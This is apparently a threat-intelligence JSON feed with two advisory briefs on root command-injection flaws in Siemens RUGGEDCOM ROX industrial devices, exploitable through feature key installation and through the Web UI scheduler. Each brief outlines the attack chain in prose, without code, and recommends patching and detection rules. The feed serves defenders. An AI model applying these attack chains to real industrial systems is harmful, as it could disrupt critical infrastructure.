{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/ruggedcom-rox-mx5000/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2025-40947"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["RUGGEDCOM ROX MX5000","RUGGEDCOM ROX MX5000RE","RUGGEDCOM ROX RX1400","RUGGEDCOM ROX RX1500","RUGGEDCOM ROX RX1501","RUGGEDCOM ROX RX1510","RUGGEDCOM ROX RX1511","RUGGEDCOM ROX RX1512","RUGGEDCOM ROX RX1524","RUGGEDCOM ROX RX1536","RUGGEDCOM ROX RX5000"],"_cs_severities":["high"],"_cs_tags":["cve","rce","siemens","ruggedcom","ics"],"_cs_type":"threat","_cs_vendors":["Siemens"],"content_html":"\u003cp\u003eA remote code execution vulnerability, tracked as CVE-2025-40947, affects multiple RUGGEDCOM ROX devices. The affected devices include RUGGEDCOM ROX MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, and RX5000, specifically all versions prior to V2.17.1. The vulnerability stems from a failure to properly sanitize user-supplied input during the feature key installation process. An authenticated attacker can exploit this flaw to inject arbitrary commands, leading to remote code execution with root privileges on the underlying operating system. This vulnerability poses a significant risk to industrial control systems relying on these devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains authenticated access to the RUGGEDCOM ROX device\u0026rsquo;s management interface.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious feature key containing embedded operating system commands.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the crafted feature key to the device through the management interface.\u003c/li\u003e\n\u003cli\u003eThe RUGGEDCOM ROX device attempts to install the feature key without proper input sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected commands within the feature key are executed with root privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device\u0026rsquo;s underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then establish persistence by modifying system files.\u003c/li\u003e\n\u003cli\u003eThe attacker can pivot to other internal assets, disrupt operations, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-40947 allows an attacker to execute arbitrary code with root privileges on vulnerable RUGGEDCOM ROX devices. This could lead to complete system compromise, denial of service, disruption of critical infrastructure, and potential lateral movement to other systems within the network. The vulnerability targets industrial control systems, potentially impacting sectors such as energy, transportation, and manufacturing.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade all affected RUGGEDCOM ROX devices (MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, and RX5000) to version V2.17.1 or later to patch CVE-2025-40947.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity related to feature key uploads to detect potential exploitation attempts. Deploy the Sigma rule \u003ccode\u003eDetect Suspicious Feature Key Uploads\u003c/code\u003e to identify such activity.\u003c/li\u003e\n\u003cli\u003eReview the logs for any unusual processes or commands executed on the RUGGEDCOM ROX devices that may indicate successful exploitation. Utilize the Sigma rule \u003ccode\u003eDetect Malicious Command Execution via Feature Key Injection\u003c/code\u003e for this purpose.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T10:19:32Z","date_published":"2026-05-12T10:19:32Z","id":"https://feed.craftedsignal.io/briefs/2026-05-siemens-rce/","summary":"CVE-2025-40947 describes a vulnerability in Siemens RUGGEDCOM ROX devices that allows authenticated remote attackers to inject arbitrary commands via a maliciously crafted feature key, resulting in remote code execution with root privileges.","title":"Siemens RUGGEDCOM ROX Devices Vulnerable to Remote Code Execution via Feature Key Injection (CVE-2025-40947)","url":"https://feed.craftedsignal.io/briefs/2026-05-siemens-rce/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2025-40949"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["RUGGEDCOM ROX MX5000","RUGGEDCOM ROX MX5000RE","RUGGEDCOM ROX RX1400","RUGGEDCOM ROX RX1500","RUGGEDCOM ROX RX1501","RUGGEDCOM ROX RX1510","RUGGEDCOM ROX RX1511","RUGGEDCOM ROX RX1512","RUGGEDCOM ROX RX1524","RUGGEDCOM ROX RX1536","RUGGEDCOM ROX RX5000"],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","ruggedcom"],"_cs_type":"advisory","_cs_vendors":["Siemens"],"content_html":"\u003cp\u003eA critical command injection vulnerability, identified as CVE-2025-40949, affects multiple RUGGEDCOM ROX devices. Specifically, the vulnerability resides in the Scheduler functionality of the Web UI. Versions prior to V2.17.1 of the RUGGEDCOM ROX MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, and RX5000 are affected. The root cause of this vulnerability is the insufficient sanitization of user-supplied input, which allows an authenticated attacker to inject arbitrary commands into the task scheduling backend. Successful exploitation allows a remote attacker to execute arbitrary commands with root privileges on the underlying operating system of the affected device. This poses a significant risk to industrial control systems (ICS) environments where these devices are commonly deployed.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains authenticated access to the RUGGEDCOM ROX Web UI.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the Scheduler functionality within the Web UI.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious commands into a user-supplied input field (e.g., task name, command to execute, schedule).\u003c/li\u003e\n\u003cli\u003eThe injected commands are not properly sanitized by the application.\u003c/li\u003e\n\u003cli\u003eWhen the scheduler processes the task, the injected commands are executed by the underlying operating system with root privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution, potentially allowing them to install malware, modify configurations, or disrupt operations.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial access to pivot to other network resources or maintain persistence on the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-40949 allows an authenticated remote attacker to execute arbitrary commands with root privileges on the RUGGEDCOM ROX device. This could lead to complete system compromise, allowing the attacker to disrupt critical infrastructure operations, steal sensitive data, or use the compromised device as a pivot point to attack other systems within the network. Given the widespread use of RUGGEDCOM devices in industrial control systems, the potential impact is significant and could affect various sectors, including energy, transportation, and manufacturing.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade all affected RUGGEDCOM ROX devices to version V2.17.1 or later to patch CVE-2025-40949.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to the Scheduler functionality of the Web UI (reference: webserver log source).\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rules provided below to detect potential exploitation attempts targeting CVE-2025-40949.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T10:17:37Z","date_published":"2026-05-12T10:17:37Z","id":"https://feed.craftedsignal.io/briefs/2026-05-cve-2025-40949-ruggedcom-rce/","summary":"An authenticated remote command injection vulnerability exists in the web UI scheduler functionality of multiple RUGGEDCOM ROX devices before V2.17.1, allowing arbitrary command execution with root privileges.","title":"CVE-2025-40949 - Siemens RUGGEDCOM ROX Web UI Command Injection","url":"https://feed.craftedsignal.io/briefs/2026-05-cve-2025-40949-ruggedcom-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — RUGGEDCOM ROX MX5000","version":"https://jsonfeed.org/version/1.1"}